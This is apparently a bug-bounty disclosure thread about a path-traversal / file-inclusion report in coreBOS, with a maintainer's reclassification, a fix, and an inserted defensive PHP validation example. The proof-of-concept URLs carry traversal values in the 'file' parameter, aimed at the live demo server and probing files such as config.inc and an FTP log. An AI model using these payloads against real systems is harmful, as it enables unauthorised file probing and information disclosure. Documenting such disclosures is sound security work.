PHP Remote File Inclusion in tsolucio/corebos

Valid

Reported on

Oct 31st 2021


Description

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS).

Proof of Concept

// PoC.js

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=../../../../../../index&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Vulnerable Parameter --> file 

Impact

This vulnerability is capable of... exposing or running files on the web server.

Joe Bordes
2 years ago

Maintainer


@shellinjector I can't reproduce this. I correctly get an invalid file error message. Can you make sure you indicated the link correctly?

Thanks

0x9x
2 years ago

Researcher


Sorry for the confusion!

Actually, I'm completely banned from the server! Let me check after changing the IP. I'm not using any specific tool to do more testing here, but as you can see there is an error that shows the full path of the server. Anyway, let me check it next time.

Thanks

Joe Bordes
2 years ago

Maintainer


Ah, I understand now. The error is not that the file can be included/loaded/seen but that you can know if it exists or not, right?

It is a disclosure of information, not a remote file inclusion.

If that is the case I would ask you to reduce the severity and I will hide that information.
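
The distinction drawn in the comment above (a file that cannot be included, but whose existence and server path leak through the error) can be closed at the parameter-handling layer. The following is an added example, not part of this thread and not coreBOS code or the fix commit; resolveModuleFile() and handleRequest() are hypothetical names, and the one-directory-per-module layout is an assumption. It validates the file parameter and returns one fixed error for every failure case.

```php
<?php
// Added example, not coreBOS code. resolveModuleFile() and handleRequest()
// are hypothetical names; the module directory layout is an assumption.
function resolveModuleFile(string $moduleDir, $file): ?string
{
    // Accept only a plain script name: no slashes, dots or null bytes.
    if (!is_string($file) || !preg_match('/\A[A-Za-z0-9_]+\z/', $file)) {
        return null;
    }
    $base = realpath($moduleDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and returns false if the target is missing.
    $real = realpath($base . DIRECTORY_SEPARATOR . $file . '.php');
    if ($real === false || !is_file($real) || !is_readable($real)) {
        return null;
    }
    // Containment: the resolved path must still sit under the module directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

function handleRequest(string $moduleDir, array $query): string
{
    $file = $query['file'] ?? null;
    $path = resolveModuleFile($moduleDir, $file);
    if ($path === null) {
        // Detail goes to the server log only; json_encode keeps it on one line.
        error_log('rejected file parameter: ' . json_encode($file));
        // Same body for traversal, missing and unreadable files: no path is
        // echoed and the client cannot tell "exists" from "does not exist".
        return 'Invalid request';
    }
    return 'OK: ' . basename($path); // a real handler would include $path here
}

// Constructed demo: a temporary module directory holding one script.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'demo_module_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'ListView.php', "<?php\n");
// 'ListView' and 'Missing' are constructed; the other two come from the thread.
foreach (['ListView', '../../../../../../index', '/config.inc', 'Missing'] as $f) {
    echo str_pad($f, 26), ' => ', handleRequest($dir, ['file' => $f]), "\n";
}
unlink($dir . DIRECTORY_SEPARATOR . 'ListView.php');
rmdir($dir);
```

Run from the PHP CLI, only the first request is accepted; the other three produce the identical response, and the rejected values appear only in the error log.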

0x9x
2 years ago

Researcher


Sure! You're right!

File exists and is readable --> index.php

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=/index&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Restricted but exists --> config.inc & config

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=/config.inc&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Thanks,

0x9x
2 years ago

Researcher


Other link (full path of the server) --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=../../../../../../var/log/vsftpd.log&ajax=true&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Joe Bordes validated this vulnerability 2 years ago
0x9x has been awarded the disclosure bounty
The fix bounty is now up for grabs

0x9x
2 years ago

Researcher


Thanks for your updates!

Joe Bordes marked this as fixed with commit c05cdd 2 years ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE

Joe Bordes
2 years ago

Maintainer


Thanks for your help!
